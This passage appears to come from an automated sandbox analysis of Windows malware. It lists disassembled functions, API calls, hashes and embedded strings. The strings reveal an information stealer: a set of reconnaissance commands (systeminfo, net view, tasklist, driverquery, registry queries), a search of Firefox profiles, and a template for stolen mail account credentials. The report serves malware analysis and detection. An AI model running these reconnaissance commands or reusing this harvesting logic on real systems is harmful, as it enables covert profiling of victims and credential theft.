HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00B24545), ref: 00B20558
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00B2057F
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00B20593
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00B205A0
HeapFree.KERNEL32(00000000,00000000), ref: 00B205C3

Strings

Client, xrefs: 00B204DE

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateComputerFreeName
String ID: Client
API String ID: 3439771632-3236430179
Opcode ID: 05438e0ff1b62488e131a5e541ee62be1c29414f0665d4ef235b4eb2106c1a60
Instruction ID: 2256a6f3828e2378a708920fa189606abaa876a257d41ce5b9264f5ce5d61a85
Opcode Fuzzy Hash: 05438e0ff1b62488e131a5e541ee62be1c29414f0665d4ef235b4eb2106c1a60
Instruction Fuzzy Hash: D431EC71A10209EFDB10EF69EDC5A6EB7F9FB58300F214469E509D3251EB70ED448B60

Uniqueness

Uniqueness Score: -1.00%

Function 00B2B0AA, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105stringsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3134B: lstrlen.KERNEL32(?,00000008,00000000,?,73B75520,00B21372,?,?,00000000,00B11589,?,00000000,?,00B25B4A,?,00000001), ref: 00B3135A
Part of subcall function 00B3134B: mbstowcs.NTDLL ref: 00B31376

lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00B17010), ref: 00B2B0FD

Part of subcall function 00B2888D: lstrlenW.KERNEL32(?,00000000,%APPDATA%\Mozilla\Firefox\Profiles,?,00000250,?,00000000), ref: 00B288D9
Part of subcall function 00B2888D: lstrlenW.KERNEL32(?,?,00000000), ref: 00B288E5
Part of subcall function 00B2888D: memset.NTDLL ref: 00B2892D
Part of subcall function 00B2888D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B28948
Part of subcall function 00B2888D: lstrlenW.KERNEL32(0000002C), ref: 00B28980
Part of subcall function 00B2888D: lstrlenW.KERNEL32(?), ref: 00B28988
Part of subcall function 00B2888D: memset.NTDLL ref: 00B289AB
Part of subcall function 00B2888D: wcscpy.NTDLL ref: 00B289BD

PathFindFileNameW.SHLWAPI(00000000,00000000,*.*,?,00000000,00000000,00000000), ref: 00B2B117
lstrlenW.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,?,00B17010), ref: 00B2B141

Part of subcall function 00B2888D: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 00B289E3
Part of subcall function 00B2888D: RtlEnterCriticalSection.NTDLL(?), ref: 00B28A18
Part of subcall function 00B2888D: RtlLeaveCriticalSection.NTDLL(?), ref: 00B28A34
Part of subcall function 00B2888D: FindNextFileW.KERNEL32(?,00000000), ref: 00B28A4D
Part of subcall function 00B2888D: WaitForSingleObject.KERNEL32(00000000), ref: 00B28A5F
Part of subcall function 00B2888D: FindClose.KERNEL32(?), ref: 00B28A74
Part of subcall function 00B2888D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B28A88
Part of subcall function 00B2888D: lstrlenW.KERNEL32(0000002C), ref: 00B28AAA

LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00B2B15E
WaitForSingleObject.KERNEL32(00000000,00000000,*.*,?,00000000,00000000,00000000), ref: 00B2B17F
PathFindFileNameW.SHLWAPI(0000001E,?,?,?,?,?,?,?,?,?,?,?,00B17010), ref: 00B2B194

Strings

*.*, xrefs: 00B2B107

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
String ID: *.*
API String ID: 2670873185-438819550
Opcode ID: 83f50ac02d701aa618faf5a9bf1d15406599669fde82ba1534629dd3d03c7751
Instruction ID: 1cc4c846cfd70e255352f1cfa7ce60178d7f16f5575a8f312667ecc1cfce1510
Opcode Fuzzy Hash: 83f50ac02d701aa618faf5a9bf1d15406599669fde82ba1534629dd3d03c7751
Instruction Fuzzy Hash: 4C315872014215AF8710AF65EC84C2EBBEAFF98355F100969F588A3161EB30ED158B62

Uniqueness

Uniqueness Score: -1.00%

Function 00B1AC31, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 00B1AC4F
RegQueryValueExA.ADVAPI32(?,Main,00000000,73BCF710,00000000,?,73BCF710,00000000), ref: 00B1AC74
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B1AC85
RegQueryValueExA.ADVAPI32(?,Main,00000000,00000000,00000000,?), ref: 00B1ACA0
HeapFree.KERNEL32(00000000,?), ref: 00B1ACBE
RegCloseKey.ADVAPI32(?), ref: 00B1ACC7

Strings

Main, xrefs: 00B1AC6B, 00B1AC70, 00B1AC9C

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseFreeOpen
String ID: Main
API String ID: 170146033-521822810
Opcode ID: dd24c363427a05211fc9860310eb659098fac86ebd6ccdd60652b754aa43d4c7
Instruction ID: 06339988670697b8831ce672c25c46e31d15d1592d73d686a2403df1dfa970ed
Opcode Fuzzy Hash: dd24c363427a05211fc9860310eb659098fac86ebd6ccdd60652b754aa43d4c7
Instruction Fuzzy Hash: CF11D476900109FFDB019FD5EE84CEEBBBDFB48344B6004AAF501A2160EB319E55DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B2798A, Relevance: 12.1, APIs: 8, Instructions: 121memoryregistrysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00B1810A: RegCreateKeyA.ADVAPI32(80000001,05778900,?), ref: 00B1811F
Part of subcall function 00B1810A: lstrlen.KERNEL32(05778900,00000000,00000000,?,?,00B279A9,00000000,?), ref: 00B1814D

RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00B279CF
RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00B279E7
HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,00B11489,00B25B4A,?,00000001), ref: 00B27A49
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B27A5D
WaitForSingleObject.KERNEL32(00000000,?,00000000,?,?,?,?,?,00B11489,00B25B4A,?,00000001), ref: 00B27AAD
HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,00B11489,00B25B4A,?,00000001), ref: 00B27AD6
HeapFree.KERNEL32(00000000,00B11489,?,00000000,?,?,?,?,?,00B11489,00B25B4A,?,00000001), ref: 00B27AE6
RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,00B11489,00B25B4A,?,00000001), ref: 00B27AEF

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
String ID:
API String ID: 3503961013-0
Opcode ID: 59e4500beb97cf57cf983f6170dfbaf0e39bc74491e07df44ff9974db0221377
Instruction ID: a62ac5e4958301609660c5b5bdaadccf1cfa3ff7dea9989f4c474269754c0c58
Opcode Fuzzy Hash: 59e4500beb97cf57cf983f6170dfbaf0e39bc74491e07df44ff9974db0221377
Instruction Fuzzy Hash: 1D41D675C04119FFCF119F94EC848EEBBBAFB08354F2044AAE519A2260DB314A95DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00B2A1FF, Relevance: 12.1, APIs: 8, Instructions: 112stringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00B3470F), ref: 00B2A215
wsprintfA.USER32 ref: 00B2A23D
lstrlen.KERNEL32(?), ref: 00B2A24C

Part of subcall function 00B24FB0: RtlFreeHeap.NTDLL(00000000,00000200,00B26EB2,00000000,00000100,00000200), ref: 00B24FBC

wsprintfA.USER32 ref: 00B2A28C
wsprintfA.USER32 ref: 00B2A2C1
memcpy.NTDLL(00000000,?,?), ref: 00B2A2CE
memcpy.NTDLL(00000008,00B383E4,00000002,00000000,?,?), ref: 00B2A2E3
wsprintfA.USER32 ref: 00B2A306

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
String ID:
API String ID: 2937943280-0
Opcode ID: 2e6a9bfc8ffbb789591bfb9d919f982a9bd3d9d1b7340dd5a3ec9c73bfbc416e
Instruction ID: ea1c5f778ec93a571bbce2d81966cfa700c4b7a56d88f141010c0886765fa5b9
Opcode Fuzzy Hash: 2e6a9bfc8ffbb789591bfb9d919f982a9bd3d9d1b7340dd5a3ec9c73bfbc416e
Instruction Fuzzy Hash: B0411075900209EFDB04DF98DC85DAEB7F8EF58308B2540A6F919D7261DB31EE058B64

Uniqueness

Uniqueness Score: -1.00%

Function 00B1F119, Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B28800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28812
Part of subcall function 00B28800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B2882B
Part of subcall function 00B28800: GetCurrentThreadId.KERNEL32 ref: 00B28838
Part of subcall function 00B28800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28844
Part of subcall function 00B28800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28852
Part of subcall function 00B28800: lstrcpy.KERNEL32(00000000), ref: 00B28874

HeapFree.KERNEL32(00000000,00000000,reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >,00000000,?,driverquery.exe >,00000000,?,tasklist.exe /SVC >,00000000,?,nslookup 127.0.0.1 >,00000000,?,net view >,00000000), ref: 00B1F209

Strings

driverquery.exe >, xrefs: 00B1F1B7
nslookup 127.0.0.1 >, xrefs: 00B1F18B
tasklist.exe /SVC >, xrefs: 00B1F1A1
net view >, xrefs: 00B1F175
wmic computersystem get domain |more , xrefs: 00B1F13C
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >, xrefs: 00B1F1CD
systeminfo.exe >, xrefs: 00B1F15B

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Temp$FilePathTime$CurrentFreeHeapNameSystemThreadlstrcpy
String ID: driverquery.exe >$net view >$nslookup 127.0.0.1 >$reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >$systeminfo.exe >$tasklist.exe /SVC >$wmic computersystem get domain |more
API String ID: 3485239229-3033342
Opcode ID: 6e677d726a0feff28fc727f6f1c8fbaab303da2f85591df0967d5e18e51d3a0f
Instruction ID: d420ba5b82411c11ff334187b3dfb4e33f5038c6aa69ec308538ef305b0c2176
Opcode Fuzzy Hash: 6e677d726a0feff28fc727f6f1c8fbaab303da2f85591df0967d5e18e51d3a0f
Instruction Fuzzy Hash: E5218333D46A73B3863136AA9C89EBB68D9C683F5075B02F5BD14BB251CE418C91D1E1

Uniqueness

Uniqueness Score: -1.00%

Function 00B2118D, Relevance: 12.1, APIs: 8, Instructions: 72memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,00B116BA,?,?,?,?), ref: 00B211B1
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B211C3
wcstombs.NTDLL ref: 00B211D1
lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,00B116BA,?,?,?), ref: 00B211F5
RtlAllocateHeap.NTDLL(00000000,00000002), ref: 00B2120A
mbstowcs.NTDLL ref: 00B21217
HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,00B116BA,?,?,?,?,?), ref: 00B21229
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,00B116BA,?,?,?,?,?), ref: 00B21243

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
String ID:
API String ID: 316328430-0
Opcode ID: 64b97980ce62eec5d09bccf3184fd113b8671d290d3ca54697600734d2f6b3e6
Instruction ID: 8faff2e9d580480387b40e856ab7c36ee7374be21eae24213cb2b11f673b3e65
Opcode Fuzzy Hash: 64b97980ce62eec5d09bccf3184fd113b8671d290d3ca54697600734d2f6b3e6
Instruction Fuzzy Hash: C721653150020AFFCF108FA5EC48E9E7BBAFB58311F204465BA09E20A0DB719A65DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B23E17, Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000040,00000000,?), ref: 00B23E23
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 00B23E41
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00B23E49
DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 00B23E67
GetLastError.KERNEL32 ref: 00B23E7B
RegCloseKey.ADVAPI32(?), ref: 00B23E86
CloseHandle.KERNEL32(00000000), ref: 00B23E8D
GetLastError.KERNEL32 ref: 00B23E95

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
String ID:
API String ID: 3822162776-0
Opcode ID: 60db8f8d12da259df062b48346d713ae75aa2fd2121749d0e6878d065f8aaf12
Instruction ID: 8573c384fea9cb3ef8671c22b8e227cf0c551c2fd64fb8afb180816d27a10722
Opcode Fuzzy Hash: 60db8f8d12da259df062b48346d713ae75aa2fd2121749d0e6878d065f8aaf12
Instruction Fuzzy Hash: F8115E39140209AFDB056F90EC88A6E3BE9EB48751F214415FA0A87160DF75CA18DB31

Uniqueness

Uniqueness Score: -1.00%

Function 00B1396E, Relevance: 11.5, APIs: 9, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: cb55f914dc1fa178c25530f70ee9a470a96fe59120a57a4ab1e18ec93c83a0e0
Instruction ID: 3d8236b2be94473835f987b3811c1675dfd6855e4670fb97b124f13a82515091
Opcode Fuzzy Hash: cb55f914dc1fa178c25530f70ee9a470a96fe59120a57a4ab1e18ec93c83a0e0
Instruction Fuzzy Hash: E0A12071800209EFDF229FA4DD44AEEBBF9FF09B04F6040A9E555A2160E7719E95EF10

Uniqueness

Uniqueness Score: -1.00%

Function 00B1C550, Relevance: 10.6, APIs: 7, Instructions: 125memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,00000000,770F4620,?,00000001,00000001,?,00B211EE,?,?,?,?,?,00000000), ref: 00B1C5A9
lstrlen.KERNEL32(?,?,?,00000000,770F4620,?,00000001,00000001,?,00B211EE,?,?,?,?,?,00000000), ref: 00B1C5C7
RtlAllocateHeap.NTDLL(00000000,73B76985,?), ref: 00B1C5F0
memcpy.NTDLL(00000000,00000000,00000000,?,00000001,00000001,?,00B211EE,?,?,?,?,?,00000000), ref: 00B1C607
HeapFree.KERNEL32(00000000,00000000), ref: 00B1C61A
memcpy.NTDLL(00000000,?,?,?,00000001,00000001,?,00B211EE,?,?,?,?,?,00000000), ref: 00B1C629
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000,770F4620,?,00000001,00000001,?,00B211EE,?,?,?), ref: 00B1C68D

Part of subcall function 00B20158: RtlLeaveCriticalSection.NTDLL(?), ref: 00B201D5

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
String ID:
API String ID: 1635816815-0
Opcode ID: 82ee73ed9c5f6801a5136d239c29a6985b63f2a83ad3b34eb1eef7564264ce1a
Instruction ID: 77d2838ff104196d3f0c538aa9c0e4f99226ceb9330bb6c830023afbf223c79d
Opcode Fuzzy Hash: 82ee73ed9c5f6801a5136d239c29a6985b63f2a83ad3b34eb1eef7564264ce1a
Instruction Fuzzy Hash: 27418D31940218AFCB22AFA4DC85AEE7FE6EF14350F5445A5F808A7161CB70AE90DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B1A32B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121stringCOMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32(?,00000000,00000000,00B2154B,00000000,73BCF5B0,00B27D3D,61636F4C,00000001,?,?), ref: 00B1A33B
StrChrA.SHLWAPI(00000000,00000020), ref: 00B1A34C

Part of subcall function 00B232D8: lstrlen.KERNEL32(?,00000000,73B76980,?,00B2AEA4,?), ref: 00B232E1
Part of subcall function 00B232D8: memcpy.NTDLL(00000000,?,00000000,?), ref: 00B23304
Part of subcall function 00B232D8: memset.NTDLL ref: 00B23313

ExitProcess.KERNEL32 ref: 00B1A480

Part of subcall function 00B225FA: StrChrA.SHLWAPI(?,?,7656D3B0,05778D54,?,?,?,00B28517,?,00000020,05778D54,?,?,00B358C6,?,?), ref: 00B22620
Part of subcall function 00B225FA: StrTrimA.SHLWAPI(?,00B3A48C,00000000,?,?,00B28517,?,00000020,05778D54,?,?,00B358C6,?,?), ref: 00B2263F
Part of subcall function 00B225FA: StrChrA.SHLWAPI(?,?,?,?,00B28517,?,00000020,05778D54,?,?,00B358C6,?,?), ref: 00B22650
Part of subcall function 00B225FA: StrTrimA.SHLWAPI(00000001,00B3A48C,?,?,00B28517,?,00000020,05778D54,?,?,00B358C6,?,?), ref: 00B22662

lstrcmp.KERNEL32(?,mail), ref: 00B1A3A9

Part of subcall function 00B267CC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00B267EF
Part of subcall function 00B267CC: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000000E,?,00000008,?,?,?,00B17010), ref: 00B26830

Strings

/C pause dll, xrefs: 00B1A35A
mail, xrefs: 00B1A3A2

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: HeapTrim$AllocateCommandExitFreeLineProcesslstrcmplstrlenmemcpymemset
String ID: /C pause dll$mail
API String ID: 4032499568-3657633402
Opcode ID: f98af837deec406c013d5dfe440c606edbbb3fff809bddf471d34f3ca5f73d78
Instruction ID: 8a273bd36bc6eaa848d4bae16856033e82244d631efeb54a9da475d6cf5eafd5
Opcode Fuzzy Hash: f98af837deec406c013d5dfe440c606edbbb3fff809bddf471d34f3ca5f73d78
Instruction Fuzzy Hash: 52319F72505301AFD710AFB4EC899AFB7E9EB88350F50896DF599D2160DB70E948CB13

Uniqueness

Uniqueness Score: -1.00%

Function 00B1FEC9, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 120stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,00B3D000,00B36985), ref: 00B1FEEB
lstrlenW.KERNEL32(?,00000000,00B3D000,00B36985), ref: 00B1FEFC
lstrlenW.KERNEL32(?,00000000,00B3D000,00B36985), ref: 00B1FF0E
lstrlenW.KERNEL32(?,00000000,00B3D000,00B36985), ref: 00B1FF20
lstrlenW.KERNEL32(?,00000000,00B3D000,00B36985), ref: 00B1FF32
lstrlenW.KERNEL32(?,00000000,00B3D000,00B36985), ref: 00B1FF3E

Strings

type=%S, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s, xrefs: 00B1FFC1

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: lstrlen
String ID: type=%S, name=%s, address=%s, server=%s, port=%u, ssl=%s, user=%s, password=%s
API String ID: 1659193697-1056788794
Opcode ID: 5e8703e05d74799b4d6185491151da48fd5476d2b072e0bd1a7a8a3d455e831c
Instruction ID: 4bf25e2e9e653f009595fce60304e5f098b4d913e2ce972c8d0baf40e9ce89fa
Opcode Fuzzy Hash: 5e8703e05d74799b4d6185491151da48fd5476d2b072e0bd1a7a8a3d455e831c
Instruction Fuzzy Hash: EA412E71E01206AFCB20DFA9C884AAEB7F9FF99304B6488BDE415E3211D7B0D945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B2FFD6, Relevance: 10.6, APIs: 7, Instructions: 108memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B28800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28812
Part of subcall function 00B28800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B2882B
Part of subcall function 00B28800: GetCurrentThreadId.KERNEL32 ref: 00B28838
Part of subcall function 00B28800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28844
Part of subcall function 00B28800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00B2BE68,00000000,?,00000000,00000000,?), ref: 00B28852
Part of subcall function 00B28800: lstrcpy.KERNEL32(00000000), ref: 00B28874

StrChrA.SHLWAPI(?,0000002C,00003219), ref: 00B3001C
StrTrimA.SHLWAPI(?,20000920), ref: 00B30039
StrTrimA.SHLWAPI(?,0A0D0920,?,?,00000001), ref: 00B300A2
HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 00B300C3
DeleteFileA.KERNEL32(?,00003219), ref: 00B300E2
HeapFree.KERNEL32(00000000,?), ref: 00B300F1
HeapFree.KERNEL32(00000000,?,00003219), ref: 00B30109

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
String ID:
API String ID: 1078934163-0
Opcode ID: 74f763d55604ba1d20bf7b2cad82159f9dbce65020d2895d8aa8e7134e94328e
Instruction ID: 9280956b138193fcd09d10b799b43cefdfe07f3a4523b964b6083b1b4443a04c
Opcode Fuzzy Hash: 74f763d55604ba1d20bf7b2cad82159f9dbce65020d2895d8aa8e7134e94328e
Instruction Fuzzy Hash: 5331AE32104709AFE325AB54EC45FAEB7E8EF44740F2504A5F644EB1A0DB71ED09C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 00B27034, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 95memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000007), ref: 00B270B6
lstrcpy.KERNEL32(00000000,grabs=), ref: 00B270C8
lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,?), ref: 00B270D5
lstrlen.KERNEL32(grabs=,?,?,?,?,?,00000000,00000000,?), ref: 00B270E7
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 00B27118

Strings

grabs=, xrefs: 00B270C2, 00B270E2

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
String ID: grabs=
API String ID: 2734445380-3012740322
Opcode ID: f8c5bd51bf22a1a4a8719f2476e2c798e5b398f1baea73bca1f10ebd310ea168
Instruction ID: 3975e68ece54a7146c974b5315e6e6d156817797fecd7376c91dcce1fe9aec17
Opcode Fuzzy Hash: f8c5bd51bf22a1a4a8719f2476e2c798e5b398f1baea73bca1f10ebd310ea168
Instruction Fuzzy Hash: C5319031940219FFCB11DF95EC89EEF7BB9EF44311F204564F809A2250DB749915CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B224F1, Relevance: 10.6, APIs: 7, Instructions: 93fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B29695: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,00B22509,?,?,00000000), ref: 00B296A1
Part of subcall function 00B29695: _aulldiv.NTDLL(?,00000000,54D38000,00000192), ref: 00B296B7
Part of subcall function 00B29695: _snwprintf.NTDLL ref: 00B296DC
Part of subcall function 00B29695: CreateFileMappingW.KERNEL32(000000FF,00B3E0D4,00000004,00000000,00001000,?,?,?,00000000,54D38000,00000192), ref: 00B296F8
Part of subcall function 00B29695: GetLastError.KERNEL32(?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,00B22509,?), ref: 00B2970A
Part of subcall function 00B29695: CloseHandle.KERNEL32(00000000,?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,00B22509), ref: 00B29742

UnmapViewOfFile.KERNEL32(?,?,?,00000000,00000001,?,00000000), ref: 00B22528
CloseHandle.KERNEL32(?), ref: 00B22531
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00B22551
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00B22577
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B317C0,?), ref: 00B225B0
GetLastError.KERNEL32(00B2A098,00000000,00000000), ref: 00B225DF
CloseHandle.KERNEL32(00000000,00B2A098,00000000,00000000), ref: 00B225EF

Part of subcall function 00B27854: lstrlenW.KERNEL32(004F0053,System,00000000,00000000,?,?,00B1F7B7,004F0053,00000000), ref: 00B27860
Part of subcall function 00B27854: memcpy.NTDLL(00000000,004F0053,00000000,00000002,?,?,00B1F7B7,004F0053,00000000), ref: 00B27888
Part of subcall function 00B27854: memset.NTDLL ref: 00B2789A

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Wow64$CloseFileHandle$EnableErrorLastRedirectionTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
String ID:
API String ID: 3181697882-0
Opcode ID: 2648dbd8a4dd1a04f38a226825e2b97a8558be9b526f85a779fa0fe6b215567e
Instruction ID: b60774549a0e993404c88ba5f8abd24228518797b6500bba7bb3e568e5c87ad6
Opcode Fuzzy Hash: 2648dbd8a4dd1a04f38a226825e2b97a8558be9b526f85a779fa0fe6b215567e
Instruction Fuzzy Hash: F031E072A00224BBEB10ABA4ED45BAE77F8EB54311F204095F809E7190DF74DA05DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B194B4, Relevance: 10.6, APIs: 7, Instructions: 89memorystringpipeCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000000,73B75520,?,?,?,00B11647,0000010D,00000000,00000000), ref: 00B194E4
RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00B194FA
memcpy.NTDLL(00000010,?,00000000,?,?,?,00B11647,0000010D), ref: 00B19530
memcpy.NTDLL(00000010,00000000,00B11647,?,?,?,00B11647), ref: 00B1954B
CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 00B19569
GetLastError.KERNEL32(?,?,?,00B11647), ref: 00B19573
HeapFree.KERNEL32(00000000,00000000,?,?,?,00B11647), ref: 00B19599

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
String ID:
API String ID: 2237239663-0
Opcode ID: 7c04ec00c05b11efe7982355da83f5a817f72da7095307014d979008f1e12893
Instruction ID: 0fc76ada7769d8e39db13051872b6829ddb492e6ee79ba806db745ea2a34bb8d
Opcode Fuzzy Hash: 7c04ec00c05b11efe7982355da83f5a817f72da7095307014d979008f1e12893
Instruction Fuzzy Hash: 1031BF36500309EFDB218FA5DC85ADF7BB9EB54310F104425FD09E3251DA30DA49DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B2ABAA, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 85memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2B8FB: RtlEnterCriticalSection.NTDLL(00B3E268), ref: 00B2B903
Part of subcall function 00B2B8FB: RtlLeaveCriticalSection.NTDLL(00B3E268), ref: 00B2B918
Part of subcall function 00B2B8FB: InterlockedIncrement.KERNEL32(0000001C), ref: 00B2B931

RtlAllocateHeap.NTDLL(00000000,?,Blocked), ref: 00B2ABDA
memcpy.NTDLL(00000000,?,?,?,00000000,?,?,?,?,?,?,?,00B1AF7F,?,00000000), ref: 00B2ABEB
